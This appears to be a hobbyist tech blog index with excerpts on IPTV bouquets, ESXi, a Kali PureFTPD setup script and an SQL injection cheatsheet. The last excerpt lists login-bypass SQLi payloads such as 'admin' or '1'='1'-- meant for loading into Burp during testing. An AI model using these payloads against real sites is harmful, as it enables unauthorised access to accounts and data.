Enigma2 IPTV m3u to bouquet

E2m3u2bouquet This post is obsolete : Please see e2m3u2bouquet homepage for latest version Background Bit of a side project this one, but following recent developments seemed a shame not to be getting the best out of the VU+ solo2 box. Long story short there are some good IPTV providers out there, however the offering enigma2 wise seems to be a giant m3u file that you import into a single bouquet or manually configure with E-channeliser. Both reasonable approaches but a bit lacking in usability and some what time consuming. Anyway a couple of nights research and a bit of messing about and... Read more

ESXi 6.5 on HP Microserver Gen 8

Well having decided to put together a small homelab and purchased a HP Microserver Gen 8 for the purpose I decided to go a head with VMware ESXi for the hypervisor, some thing new and we all like a challenge right? Well its defintely been a challange in retrospec Hyper-V might have been easier but anyway I’ll get the process down well its still fresh in my mind. Setup is currently the bog standard microserver, so 4gb Ram, celeron 2.3, 32GB USB stick and 2 X 2TB SATA drives… memory and processor upgrades yet to come. Downloaded the HP specific... Read more

Kali Linux install PureFTPD

A very quick and dirty guide to installing Pure FTPd on kali linux Install apt-get install pure-ftp Create a basic setup script nano ftp-setup.sh #!/bin/bash groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pw useradd ftpuser -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth/ ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ /etc/init.d/pure-ftpd restart Make script executable and execute chmod 777 ftp-setup.sh ./ftp-setup.sh

SQLi Cheatsheet

SQLi Quick list of useful SQLi payloads, unsure of the original author to credit but is knocking about various areas of the web, useful reference to load into burp ' or 1=1 or 1=1-- or 1=1# or 1=1* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'* admin' or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'* 1234' AND 1=0 UNION... Read more